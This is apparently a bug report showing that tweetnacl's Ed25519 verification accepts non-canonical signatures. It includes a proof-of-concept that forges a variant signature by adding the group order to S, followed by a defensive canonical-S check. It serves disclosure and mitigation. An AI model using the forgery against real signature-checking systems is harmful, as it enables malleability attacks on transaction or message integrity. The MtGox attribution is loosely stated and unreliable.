tweetnacl ed25519 signature verification is malleable and does not have SUF-CMA (strong unforgeability under chosen message attacks). Malleability is problematic in a blockchain context. MtGox was hacked because of it.
```js
// mkdir test && cd test && npm init -y && npm install @noble/curves@1.0.0 tweetnacl@1.0.3
// touch demo.mjs; then node demo.mjs
import { ed25519 } from '@noble/curves/ed25519';
import { bytesToNumberLE, numberToBytesLE } from '@noble/curves/abstract/utils';
import { default as nacl } from 'tweetnacl';

const priv = ed25519.utils.randomPrivateKey();
const pub = ed25519.getPublicKey(priv);
const msg = new TextEncoder().encode('hello world');
const sig = ed25519.sign(msg, priv);

// An Ed25519 signature is R (32 bytes) || S (32 bytes, little-endian scalar).
const [R, s] = [sig.slice(0, 32), sig.slice(32, 64)];
// Add the group order n to S: S'*B is the same point, so the verification
// equation still holds, but S' >= n is a non-canonical encoding.
const s_forged = numberToBytesLE(bytesToNumberLE(s) + ed25519.CURVE.n, 32);
const sig_forged = new Uint8Array([...R, ...s_forged]);

// Second value on each line is the forged signature; tweetnacl prints true for it.
console.log('reference', ed25519.verify(sig, msg, pub), ed25519.verify(sig_forged, msg, pub));
console.log('nacl', nacl.sign.detached.verify(msg, sig, pub), nacl.sign.detached.verify(msg, sig_forged.slice(), pub));
```
The behavior defies RFC 8032, which prohibits S >= L. Folks in 2020/1244.pdf also mentioned similar stuff.
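The check a caller can apply today, as an added example that is not part of this issue and not tweetnacl's own code: decode S as a little-endian integer and reject the signature unless S < L, as RFC 8032 requires, before handing it to the library. The group order L is the RFC 8032 constant; `malleate` rebuilds the issue's S + L trick with plain BigInt arithmetic so the check can be exercised without any dependency, and the R bytes and S scalar in the test vector are constructed here, not a real signature. The `strictVerify` wrapper is a hypothetical helper that takes any verify function with tweetnacl's (msg, sig, pub) argument order.

```javascript
// Added example, not from the issue or from tweetnacl.
// Ed25519 group order L = 2^252 + 27742317777372353535851937790883648493 (RFC 8032).
const L = (1n << 252n) + 27742317777372353535851937790883648493n;

// Little-endian bytes -> BigInt, the encoding RFC 8032 uses for S.
function bytesToBigIntLE(bytes) {
  let x = 0n;
  for (let i = bytes.length - 1; i >= 0; i--) x = (x << 8n) | BigInt(bytes[i]);
  return x;
}

// BigInt -> fixed-width little-endian bytes; throws if the value does not fit.
function bigIntToBytesLE(x, len) {
  const out = new Uint8Array(len);
  for (let i = 0; i < len; i++) {
    out[i] = Number(x & 0xffn);
    x >>= 8n;
  }
  if (x !== 0n) throw new RangeError('value does not fit in ' + len + ' bytes');
  return out;
}

// A detached signature is R (32 bytes) || S (32 bytes) and RFC 8032 requires S < L.
// Returns true only for a 64-byte signature whose S is in canonical range.
function hasCanonicalS(sig) {
  if (!(sig instanceof Uint8Array) || sig.length !== 64) return false;
  return bytesToBigIntLE(sig.subarray(32)) < L;
}

// The malleation from the issue: keep R, replace S with S + L.
// S + L < 2L < 2^253, so it always fits in 32 bytes when S < L.
function malleate(sig) {
  const s = bytesToBigIntLE(sig.subarray(32));
  return new Uint8Array([...sig.subarray(0, 32), ...bigIntToBytesLE(s + L, 32)]);
}

// Hypothetical wrapper: refuse non-canonical S before delegating to a verify
// function with tweetnacl's argument order, e.g. nacl.sign.detached.verify.
function strictVerify(verify, msg, sig, pub) {
  return hasCanonicalS(sig) && verify(msg, sig, pub);
}

// Constructed test vector (not a real signature): arbitrary R, small S.
const R = new Uint8Array(32).fill(0x11);
const S = bigIntToBytesLE(12345n, 32);
const sigCanonical = new Uint8Array([...R, ...S]);
const sigMalleated = malleate(sigCanonical);
```

The wrapper only closes the S >= L case this issue demonstrates; it is the precondition RFC 8032 states for verification, so a library that already enforces it should behave identically with or without it.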